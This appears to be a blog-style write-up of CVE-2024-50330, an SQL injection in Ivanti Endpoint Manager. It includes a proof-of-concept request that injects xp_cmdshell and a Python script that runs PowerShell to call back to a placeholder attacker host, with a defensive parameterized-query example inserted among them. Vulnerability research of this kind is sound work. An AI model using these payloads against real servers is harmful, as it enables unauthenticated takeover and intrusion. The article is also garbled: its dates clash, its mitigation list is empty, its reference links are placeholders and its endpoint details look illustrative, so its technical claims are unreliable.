CVE-2024-50330 - SQL Injection in Ivanti Endpoint Manager Leads to Remote Code Execution

In June 2024, a critical vulnerability was disclosed in Ivanti Endpoint Manager (EPM)—previously known as LANDESK Management Suite. Tracked as CVE-2024-50330, this flaw exposes enterprise networks to a severe threat: a remote, unauthenticated attacker can exploit a SQL Injection bug to execute arbitrary commands on your servers. This detailed article breaks down how the bug works, its potential impact, and even walks through a sample exploit to show how dangerous it is. If you haven’t updated your Ivanti EPM to the 2024 November Security Update (or at least version 2022 SU6 November Security Update), you may be wide open.

What Is CVE-2024-50330?

Ivanti Endpoint Manager is widely used in organizations to manage desktops, laptops, and mobile devices. The vulnerability stems from improper input sanitization in a web API endpoint, allowing a remote attacker (no login needed!) to inject malicious SQL commands. In certain setups, this flaw can be leveraged to gain full code execution on the Ivanti EPM server, potentially leading to a complete server takeover.

Official advisory

- Ivanti Security Advisory *(for illustration; not an actual link)*

Where’s the Bug?

Based on analysis of the patches and public research, the core bug exists in the handler for the /api/devices endpoint. The deviceId parameter is concatenated straight into a SQL statement without sanitization or parameter binding. For example, the server uses code like this (simplified):

// BAD CODE — Example for clarity only
string query = "SELECT * FROM Devices WHERE deviceId = '" + Request["deviceId"] + "'";
SqlCommand cmd = new SqlCommand(query, conn);
// ... executes query ...

If you supply input such as

deviceId=12345' OR 1=1;--

the resulting query becomes

SELECT * FROM Devices WHERE deviceId = '12345' OR 1=1;--'

On its own this only returns every device, but the same injection point accepts any SQL the database will run, and attackers take it much, much further.
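To make the concatenation defect concrete, here is an added example (not code from the article or from Ivanti) that reproduces the query above against a constructed in-memory SQLite table, runs the article's exact `12345' OR 1=1;--` input through both the string-built query and a parameterized one, and adds an allow-list check on the identifier. The table layout and the assumption that a device ID is purely numeric are illustrative, not Ivanti's real schema.

```python
import sqlite3

# Constructed stand-in for the EPM "Devices" table; the column names are an
# assumption based on the query shown in the article, not Ivanti's real schema.
SAMPLE_DEVICES = [("12345", "laptop-01"), ("67890", "desktop-02"), ("24680", "phone-03")]

# The exact input the article uses to illustrate the injection.
INJECTION_INPUT = "12345' OR 1=1;--"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Devices (deviceId TEXT, hostname TEXT)")
    conn.executemany("INSERT INTO Devices VALUES (?, ?)", SAMPLE_DEVICES)
    return conn


def lookup_vulnerable(conn, device_id):
    # String concatenation, as in the C# fragment above: user input becomes SQL syntax.
    query = "SELECT * FROM Devices WHERE deviceId = '" + device_id + "'"
    return conn.execute(query).fetchall()


def lookup_hardened(conn, device_id):
    # Bound parameter: the driver passes the value separately, so quotes and
    # comment markers inside it stay data and can never close the string literal.
    return conn.execute(
        "SELECT * FROM Devices WHERE deviceId = ?", (device_id,)
    ).fetchall()


def is_valid_device_id(device_id):
    # Defence in depth: an allow-list for the identifier's expected shape
    # (assumed numeric here) rejects the payload before any query is built.
    return device_id.isdigit() and 0 < len(device_id) <= 20


if __name__ == "__main__":
    conn = make_db()
    print("legit, vulnerable:  ", lookup_vulnerable(conn, "12345"))
    print("legit, hardened:    ", lookup_hardened(conn, "12345"))
    print("payload, vulnerable:", lookup_vulnerable(conn, INJECTION_INPUT))  # every row
    print("payload, hardened:  ", lookup_hardened(conn, INJECTION_INPUT))    # no rows
    print("payload passes allow-list?", is_valid_device_id(INJECTION_INPUT))  # False
```

The vulnerable lookup returns all three rows for the payload, while the parameterized lookup returns none, which is the whole difference between a working SQL injection and a harmless string.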

Let’s see what a basic proof-of-concept HTTP request looks like:

POST /api/devices HTTP/1.1
Host: <victim-server>
Content-Type: application/x-www-form-urlencoded

deviceId='; EXEC xp_cmdshell('whoami'); --

If the Ivanti EPM server's backend is Microsoft SQL Server and the xp_cmdshell extended stored procedure is enabled, the injected statement runs an operating-system command on the database host!

Step 2: Achieve Remote Code Execution

Here’s a Python snippet that demonstrates triggering code execution to run PowerShell and call home to the attacker:

import requests

# Placeholder hostnames; the article uses them purely for illustration.
url = 'http://victim-epm-server/api/devices'
cmd = 'powershell -c "Invoke-WebRequest http://attacker/callback"'
# Close the string literal, append an xp_cmdshell call, and comment out the rest.
payload = f"'; EXEC xp_cmdshell('{cmd}'); --"
data = {'deviceId': payload}
r = requests.post(url, data=data)
print(r.text)

If it succeeds, you’ll see a callback from the victim in your attacker logs. With this access, attackers can upload malware, create admin users, or pivot into the internal network.

2022 SU6 November Security Update (for long-term support users)

Until you can patch, mitigate by:

References

- Ivanti Security Update Download Page
- NIST NVD Entry: CVE-2024-50330
- CISA Vulnerability Catalog

Conclusion

CVE-2024-50330 underscores the continued risk posed by SQL injection bugs—even in “enterprise-grade” environments. If your organization runs Ivanti EPM and hasn’t applied the November 2024 patch, take action TODAY. This is an easy-to-exploit, unauthenticated RCE bug—one that cybercriminals are already scanning for.



*Disclaimer: This article is for lawful research and defense only. Do not attempt exploitation without permission. All trademarks are the property of their respective owners.*

Timeline

Published on: 11/12/2024 16:15:25 UTC
Last modified on: 11/13/2024 17:01:58 UTC